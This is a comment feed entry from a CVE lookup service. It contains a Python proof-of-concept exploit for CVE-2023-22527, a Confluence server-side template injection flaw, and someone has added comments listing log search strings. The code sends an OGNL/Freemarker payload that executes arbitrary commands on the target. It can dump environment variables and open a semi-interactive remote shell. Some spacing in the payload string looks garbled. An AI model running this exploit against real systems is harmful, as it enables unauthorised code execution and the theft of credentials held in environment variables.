https://cve.circl.lu/comments/feed Most recent comment. 2025-03-01T14:28:58.127000+00:00 Vulnerability-Lookup info@circl.lu python-feedgen Contains only the most 10 recent comments. https://cve.circl.lu/comment/a58dda1d-0763-4d89-ad38-22d86eb55d6a POC for CVE-2023-22527 (Confluence SSTI) - Struts2 2025-03-01T14:28:58.163245+00:00 Alexandre Dulaunoy http://cvepremium.circl.lu/user/adulau
~~~python
# Proof of concept for CVE-2023-22527 as posted in the feed comment above.
#
# Reading notes for defenders, taken from the code below:
#   * The request is a POST to the path /template/aui/text-inline.vm.
#   * The form body carries a `label` parameter containing the literal text
#     `\u0027`, the string `.KEY_velocity.struts2.context` and a second
#     parameter `x` that names `freemarker.template.utility.Execute`.
#     These strings are usable as web-server / WAF log search terms.
#   * No cookie, token or other credential is attached to the request.
# Remediation is a vendor upgrade; the page does not state fixed versions,
# so take them from the vendor advisory for this CVE.
import requests
import argparse

class exploit:
    """Client that sends the CVE-2023-22527 request to one base URL.

    The class keeps only the target base URL; every method ends up in
    ``rce``, which performs a single HTTP POST per call.
    """

    def __init__(self, url):
        """Store the base URL that the request path is later appended to."""
        self.url = url

    def rce(self, cmd='', header='Ret-rce'):
        """POST the template-injection body and return the leading response text.

        Args:
            cmd: string concatenated, unescaped, into the request body.
            header: accepted but never read in this method.

        Returns:
            The response text that precedes the first ``<!DOCTYPE html>``
            marker, with surrounding whitespace stripped.
        """
        # The body literal is reproduced byte-for-byte from the feed. The
        # doubled backslashes mean the wire carries the text `\u0027` /
        # `\u005b` / `\u005d`, not the quote and bracket characters themselves.
        data = 'label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameter s.x,{})%2b\\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"'+cmd+'"}))\r\ n'
        # No timeout and no status check: the call blocks until the server
        # answers and an HTTP error body is returned like any other response.
        r = requests.post(f'{self.url}/template/aui/text-inline.vm',
            data=data,
            headers = {
                'Connection': 'close',
                'Content-Type': 'application/x-www-form-urlencoded',
                # len(data) counts characters, not encoded bytes.
                'Content-Length': str(len(data))
            }
        )
        # Everything from the HTML doctype onward is discarded; if the marker
        # is absent, split() yields the whole body.
        return r.text.split('<!DOCTYPE html>')[0].strip()

    def get_env(self):
        """Call ``rce`` with the fixed command string ``env``."""
        return self.rce(cmd='env')

    def shell(self):
        """Read lines from stdin and pass each one to ``rce`` until interrupted."""
        print('[DEBUG] Spawning semi-interactive shell ..')
        # The loop has no exit condition; it ends only when input() or the
        # HTTP call raises (for example EOF or Ctrl-C). One POST per line.
        while 1:
            cmd = input('$ ')
            result = self.rce(cmd)
            print(result)

def parse_args():
    """Parse the command line: -u URL, -c command, -e env dump, -i interactive."""
    parser = argparse.ArgumentParser(add_help=True, description='This is a POC for CVE-2023-22527 (Confluence SSTI)')
    # -u is declared optional, yet main() uses args.url unconditionally, so an
    # omitted -u reaches the f-string in rce() as None.
    parser.add_argument("-u",dest="url",type=str,required=False, help="Url")
    parser.add_argument("-c",dest="command",type=str,required=False, default=None,help="Command")
    parser.add_argument("-e",dest="env",action="store_true",required=False,default=False, help="Get environnement vars")
    parser.add_argument("-i",dest="interactive",action="store_true",required=False,default=False, help="Interactive mod")
    return parser.parse_args()

def main(args):
    """Run whichever of the env, command and interactive actions were selected."""
    # NOTE(review): block structure is reconstructed from a collapsed listing;
    # the instantiation below is assumed to sit outside this `if`.
    # The error is only printed: execution continues, and because none of the
    # three flags is set the branches below are all skipped.
    if args.command is None and not args.env and not args.interactive:
        print('[ERROR] Please provide a command using -c option')
    exp = exploit(url = args.url)
    # The three actions are independent; several flags produce several requests.
    if args.env:
        res = exp.get_env()
        print(res)
    if args.command:
        res = exp.rce(args.command)
        print(res)
    if args.interactive:
        exp.shell()

if __name__ == '__main__':
    args = parse_args()
    main(args = args)
~~~
2025-01-17T21:29:08.826577+00:00